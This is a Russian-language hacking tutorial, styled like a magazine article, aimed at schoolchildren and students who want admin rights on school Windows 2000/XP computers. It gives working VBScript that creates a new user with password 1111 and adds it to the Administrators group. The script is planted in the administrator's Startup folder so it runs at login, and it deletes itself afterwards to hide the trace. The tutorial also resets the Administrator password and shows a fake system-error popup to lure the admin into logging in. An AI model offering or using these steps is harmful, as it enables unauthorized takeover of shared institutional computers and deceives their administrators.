Прива вам школьники и студенты! Я хочу дать вам несколько полезных советов к началу учебного года.
Я более чем уверен, что вас уже достала ваша учетная запись с
ограниченными правами на виндах 2k NT или XP и вам хочется больше,
намного больше! В вашем учебном заведении наверняка есть злые дядьки, которых называют админами, и только эти негодяи знают пассы на элитные учетные записи.
Просто падонки, не правда ли? Мы это исправим, более того, мы их свергнем, а вы будете новым королём с большими
привилегиями.
Итак, что нам для этого нужно? Лишь 5-10
минут провести за нужным нам компом, что бы
на нём был хотя бы один текстовый редактор и
целый запас желания получить админскую
учетку. Весь этот способ основан на WSH,
лучшего пожалуй средсвта для компьютерного
западла в виндах (смотри
][ 36 выпуск!). Ни для кого не секрет, что
админы логятся на тачках со своей учетной
записью (да часто с таким гордым видом)... От
этого и будем плясать. Сначала нам
потребуется написать простой скриптик "Действия
I (урвать хоть что-нибудь)".
Sub helo(admin, Wait)
Set WshShell=WScript.CreateObject("WScript.Shell")
X=WshShell.Run(admin,Wait)
End Sub
Call helo("C:\windows\system32\net.exe user xakep 1111 /add", True)
\\\ тут мы добавляем юзера xakep
c паролем 1111
Call helo("C:\windows\system32\net.exe localgroup
Администраторы xakep /add", True)
\\\ тут наш юзер становится
настоящим админом !!!
и назовем наше творение admin.vbs.
Да всё это просто замечательно, только прав
у нас маловато. А вот прав админчика нам как
раз хватит, поскольку ключ реестра
HKEY_LOCAL_MACHINE нам не доступен у нас не
получится заставить грузится этот скрипт у
всех юзеров. А зачем нам лишние заморочки,
мы будем делать проще, мы просто откроем
путь c:\Documents and Settings\Администратор\Главное
меню\Программы\Автозагрузка\ и нежно и
аккуратно положим туда наш скрипт. Тут
возникает другой вопрос - а вдруг админ его
заметит... Не заметит, в конце скрипта
добавляем следующее:
Set Killer=CreateObject("Scripting.FileSystemObject")
Killer.DeleteFile(" C:\Documents and Settings\Администратор\
Главное меню\Программы\Автозагрузка\ admin.vbs")
(главное помнить, что админ может
использовать не встроенную учетную запись
"Администратор", а что-нибудь
поудобнее, но я вас уверяю, с правами он себя
никогда не обделит). И после того, как админ
войдёт в систему под своим аккаунтом все
дело будет сделано, а как заставить его это
сделать я расскажу в конце. Итак,
собственный админский аккаунт у нас уже
есть, но что мешает настоящему админу его
удалить... Это тоже поправимо, делаем
следующее.
Заходим в командную строку и набиваем "net
localgroup Администраторы" - смотрим кто же у
нас имеет права админить, записываем или
запоминаем... Действие II ( прощай админ, не
поминай лихом). Пишем примерно такой же
скрипт ;
Sub helo(admin, Wait)
Set WshShell=WScript.CreateObject("WScript.Shell")
X=WshShell.Run(admin,Wait)
End Sub
Call helo("C:\windows\system32\net.exe user Администратор 1111
/add", True)
Действие III (админ иди работай)
Теперь как же быть с толстыми и ленивыми
админами, которым влом хотя бы раз в неделю
проверить комп? Их придётся заставить
тащить свою задницу к тачке и логинится
адинской записью. Надо так надо... К примеру
пусть выскакивает мессага о какой-нибудь
злой ошибке (это я полностью украду из их
журнала выпуска 36) - тоже небольшой скриптик,
который мы поместим в реестре на этот раз:
Hacker = MsgBox("тут вы впишите
чтонибудь заумное и страшное например "Explorer.exe
не может получить доступ к памяти 0x77e626ba",
20, "System error")